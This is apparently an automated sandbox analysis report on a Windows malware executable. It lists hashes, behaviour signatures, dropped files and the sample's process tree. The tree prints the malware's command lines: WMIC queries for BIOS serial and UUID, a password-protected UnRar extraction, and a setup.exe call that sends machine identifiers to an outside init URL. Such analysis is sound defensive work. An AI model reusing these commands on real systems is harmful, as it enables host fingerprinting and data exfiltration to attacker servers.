fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc

Analysis

max time kernel
164s
max time network
182s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
25/11/2022, 20:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe
Size

280KB
MD5

1a7c8bd548f6319aa669dab90bbeb658
SHA1

17a56dbb083a01b8bae5edc54d371232f531b53f
SHA256

fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc
SHA512

c11a5ef6e3b4c2555500a1135506139a19896180059efb8210c544cef623f512cebb8d0899bf7c39c03679e1f6d6b4ab0624647190a4b2826dbe7a57aeeb6c27
SSDEEP

6144:jsn3wPkENvH4UYpNeQUMKfDrHy8hR1yfey1rgx:83wRNfRWNH4/yeKfegrY

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4384	UnRar.exe
400	setup.exe

Loads dropped DLL 5 IoCs

pid	Process
4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe
4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe
4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe
4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe
4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4268	WMIC.exe
Token: SeSecurityPrivilege	4268	WMIC.exe
Token: SeTakeOwnershipPrivilege	4268	WMIC.exe
Token: SeLoadDriverPrivilege	4268	WMIC.exe
Token: SeSystemProfilePrivilege	4268	WMIC.exe
Token: SeSystemtimePrivilege	4268	WMIC.exe
Token: SeProfSingleProcessPrivilege	4268	WMIC.exe
Token: SeIncBasePriorityPrivilege	4268	WMIC.exe
Token: SeCreatePagefilePrivilege	4268	WMIC.exe
Token: SeBackupPrivilege	4268	WMIC.exe
Token: SeRestorePrivilege	4268	WMIC.exe
Token: SeShutdownPrivilege	4268	WMIC.exe
Token: SeDebugPrivilege	4268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4268	WMIC.exe
Token: SeRemoteShutdownPrivilege	4268	WMIC.exe
Token: SeUndockPrivilege	4268	WMIC.exe
Token: SeManageVolumePrivilege	4268	WMIC.exe
Token: 33	4268	WMIC.exe
Token: 34	4268	WMIC.exe
Token: 35	4268	WMIC.exe
Token: 36	4268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4268	WMIC.exe
Token: SeSecurityPrivilege	4268	WMIC.exe
Token: SeTakeOwnershipPrivilege	4268	WMIC.exe
Token: SeLoadDriverPrivilege	4268	WMIC.exe
Token: SeSystemProfilePrivilege	4268	WMIC.exe
Token: SeSystemtimePrivilege	4268	WMIC.exe
Token: SeProfSingleProcessPrivilege	4268	WMIC.exe
Token: SeIncBasePriorityPrivilege	4268	WMIC.exe
Token: SeCreatePagefilePrivilege	4268	WMIC.exe
Token: SeBackupPrivilege	4268	WMIC.exe
Token: SeRestorePrivilege	4268	WMIC.exe
Token: SeShutdownPrivilege	4268	WMIC.exe
Token: SeDebugPrivilege	4268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4268	WMIC.exe
Token: SeRemoteShutdownPrivilege	4268	WMIC.exe
Token: SeUndockPrivilege	4268	WMIC.exe
Token: SeManageVolumePrivilege	4268	WMIC.exe
Token: 33	4268	WMIC.exe
Token: 34	4268	WMIC.exe
Token: 35	4268	WMIC.exe
Token: 36	4268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5060	WMIC.exe
Token: SeSecurityPrivilege	5060	WMIC.exe
Token: SeTakeOwnershipPrivilege	5060	WMIC.exe
Token: SeLoadDriverPrivilege	5060	WMIC.exe
Token: SeSystemProfilePrivilege	5060	WMIC.exe
Token: SeSystemtimePrivilege	5060	WMIC.exe
Token: SeProfSingleProcessPrivilege	5060	WMIC.exe
Token: SeIncBasePriorityPrivilege	5060	WMIC.exe
Token: SeCreatePagefilePrivilege	5060	WMIC.exe
Token: SeBackupPrivilege	5060	WMIC.exe
Token: SeRestorePrivilege	5060	WMIC.exe
Token: SeShutdownPrivilege	5060	WMIC.exe
Token: SeDebugPrivilege	5060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5060	WMIC.exe
Token: SeRemoteShutdownPrivilege	5060	WMIC.exe
Token: SeUndockPrivilege	5060	WMIC.exe
Token: SeManageVolumePrivilege	5060	WMIC.exe
Token: 33	5060	WMIC.exe
Token: 34	5060	WMIC.exe
Token: 35	5060	WMIC.exe
Token: 36	5060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5060	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
400	setup.exe
400	setup.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4480 wrote to memory of 4268	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	82
PID 4480 wrote to memory of 4268	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	82
PID 4480 wrote to memory of 4268	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	82
PID 4480 wrote to memory of 5060	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	88
PID 4480 wrote to memory of 5060	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	88
PID 4480 wrote to memory of 5060	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	88
PID 4480 wrote to memory of 2848	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	89
PID 4480 wrote to memory of 2848	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	89
PID 4480 wrote to memory of 2848	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	89
PID 4480 wrote to memory of 4848	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	91
PID 4480 wrote to memory of 4848	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	91
PID 4480 wrote to memory of 4848	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	91
PID 4480 wrote to memory of 4384	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	93
PID 4480 wrote to memory of 4384	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	93
PID 4480 wrote to memory of 4384	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	93
PID 4480 wrote to memory of 400	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	96
PID 4480 wrote to memory of 400	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	96
PID 4480 wrote to memory of 400	4480	fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe	96
PID 400 wrote to memory of 1420	400	setup.exe	97
PID 400 wrote to memory of 1420	400	setup.exe	97
PID 400 wrote to memory of 1420	400	setup.exe	97

C:\Users\Admin\AppData\Local\Temp\fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe
"C:\Users\Admin\AppData\Local\Temp\fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4480
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5060
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:2848
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:4848
- C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\UnRar.exe
  UnRar.exe e -hp2014/04/11-13:04:32 {RANDOM}.rar
  2⤵
  - Executes dropped EXE
  PID:4384
- C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\setup.exe" /initurl http://sub.nuidal.info/init/fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc/:uid:? /affid "-" /id "0" /name " " /uniqid fbdd84447f3069b64cc5c2dc6ae0069a022f6b35582f52f5064beaf6289f79bc /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic bios get serialnumber, version
    3⤵
    PID:1420

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\UnRAR.exe

Filesize
302KB

MD5
d76c614a5810fdfaa611ee673c6737ed

SHA1
e1b49180eab5fac73ef8bd0af5c247534d2da414

SHA256
a6c0103ab6e07349c43b46ee1da62a0d74d40288427d23fd44faba75f5e275bf

SHA512
d0fc75ef754894e8704d090ed450c1e3f7513521abcc66d2b3e1cb126af00f4b25d24af2beb0595c6911a7dba53a51d0e4c271e34860e6902db84ebb61d4eaed

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\UnRar.exe

Filesize
302KB

MD5
d76c614a5810fdfaa611ee673c6737ed

SHA1
e1b49180eab5fac73ef8bd0af5c247534d2da414

SHA256
a6c0103ab6e07349c43b46ee1da62a0d74d40288427d23fd44faba75f5e275bf

SHA512
d0fc75ef754894e8704d090ed450c1e3f7513521abcc66d2b3e1cb126af00f4b25d24af2beb0595c6911a7dba53a51d0e4c271e34860e6902db84ebb61d4eaed

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\setup.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\setup.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz1F13.tmp\{RANDOM}.rar

Filesize
85KB

MD5
af1e64a0082a3f3d49a121eaa672d157

SHA1
d5bc533bdce6480a07972963c1911c7ad2f60d89

SHA256
70b24594ff4319975749ae55396f849b19276e3a84946a98bf077645fc7faacc

SHA512
c1dca46fad03d96c5a8aa9eebca2ab2ed916a29fd67830b3b69dd4da4b1c7fe44c4216cc5d5ca8aa396941737f4644a78a3fe7df782602f0bbe851eea3b6a526

Download Submit